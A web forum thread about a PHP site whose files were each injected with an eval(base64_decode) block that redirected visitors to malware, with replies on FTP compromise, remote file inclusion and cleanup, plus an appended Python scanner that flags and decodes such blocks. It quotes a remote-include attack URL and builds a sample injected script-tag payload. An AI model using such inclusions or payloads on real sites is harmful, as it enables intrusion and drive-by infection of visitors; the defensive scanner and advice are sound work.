PHP code inserted in all files
Posted: Tue May 18, 2010 11:46 am
by broncha
Hi,
I noticed this when my site was automatically being redirected to a malware hosting site. My site was attacked and when I downloaded the files to check them, I found a block of PHP code inserted in each and every file. The code was base64 encoded PHP code which was eval()'ed in the beginning of every file.
The code inserted a script tag with an external js file source which sets some cookies and redirects to another site.
Any idea how the attacker was actually able to insert the code physically in each and every file??
Please help.
Re: PHP code inserted in all files
Posted: Tue May 18, 2010 12:20 pm
by flying_circus
More than likely your ftp account was compromised. Change your passwords.
Re: PHP code inserted in all files
Posted: Fri Jul 30, 2010 4:26 pm
by Cr00zng
While the FTP account exploited could cause this, is there any time when the PHP in itself could be the reason?
Re: PHP code inserted in all files
Posted: Sat Jul 31, 2010 2:28 pm
by ColonelSandersLite
I don't see why not. If you could manage to execute php code of your specification (google remote code execution), php does have the capability to write data to files and it's not that hard to get a complete list of files from php either.
An example:
http://www.devshed.com/c/a/PHP/PHP-Security-Mistakes/
On many PHP installations, the include() and require() functions can include remote files. If the malicious user were to call your script like this:
script.php?page=http://mysite.com/evilscript.php
That would pretty much let the attacker do whatever they wanted.
An intrusion via ftp is likely, however a web based attack cannot be ruled out without more information.
Re: PHP code inserted in all files
Posted: Sat Jul 31, 2010 5:01 pm
by superdezign
That seems possible if the remote script being called outputs PHP code, rather than just being a PHP file.
I, too, doubt that this is an issue of the FTP being compromised. You should beef up your code's security or pay one of those auditing companies to check your code for you.
Re: PHP code inserted in all files
Posted: Sun Aug 01, 2010 1:45 pm
by ColonelSandersLite
Just a thought:
Since you didn't mention at all:
A: what level of business the site is (could be anything from hobby to a moderate corporation)
B: whether or not this is a prepackaged php installation or custom code
If it's part of a prepackaged installation, I would suggest:
Make a complete backup of the corrupted files for further examination.
Run malware scans on any and all machines you use to administrate the site.
Change the passwords to access the webserver through your webhost if appropriate.
Change the ftp password.
Reinstall the software/restore from the most recent unaffected backup.
Report the problem in detail to the software's maker. Be sure to offer any available logs and a copy of the affected files.
Of course, if it's custom software written by you, be sure to check it over for security holes that might allow remote code execution especially.
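Added example, not written by any poster in this thread: a small triage scanner for the backup copy of the affected files. It flags files that begin with the eval(base64_decode(...)) block described in the first post and decodes the payload for inspection without executing it. The 2 KiB "head" window, the file suffixes, the file names and the sample payload in demo() are assumptions constructed for illustration.

```python
import base64
import re
import tempfile
from pathlib import Path

# eval(base64_decode('...')) with optional whitespace and either quote style.
INJECT_RE = re.compile(
    rb"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)\s*;?",
    re.IGNORECASE)
HEAD_BYTES = 2048  # assumption: "beginning of the file" means the first 2 KiB


def scan_file(path):
    """Return the decoded (never executed) payload if the block starts near the top, else None."""
    data = Path(path).read_bytes()
    m = INJECT_RE.search(data)
    if m is None or m.start() > HEAD_BYTES:
        return None
    try:
        return base64.b64decode(m.group(2))
    except ValueError:
        return b""  # pattern matched but the blob is not valid base64


def scan_tree(root, suffixes=(".php", ".inc", ".html")):
    """Map each flagged file (path relative to root) to its decoded payload."""
    hits = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            payload = scan_file(path)
            if payload is not None:
                hits[path.relative_to(root).as_posix()] = payload
    return hits


def demo():
    """Scan a constructed two-file tree: one clean file, one with a block prepended."""
    injected = b'echo "<script src=\'http://malware.example.invalid/x.js\'></script>";'
    blob = base64.b64encode(injected)
    with tempfile.TemporaryDirectory() as tmp:
        (Path(tmp) / "lib").mkdir()
        (Path(tmp) / "index.php").write_bytes(
            b"<?php eval(base64_decode('" + blob + b"')); ?>\n<?php echo 'home'; ?>\n")
        (Path(tmp) / "lib" / "util.php").write_bytes(b"<?php echo 'ok'; ?>\n")
        return scan_tree(tmp)


if __name__ == "__main__":
    print(demo())
```

Run scan_tree() against the backup rather than the live site. An empty result only means this one pattern is absent, not that the files are clean.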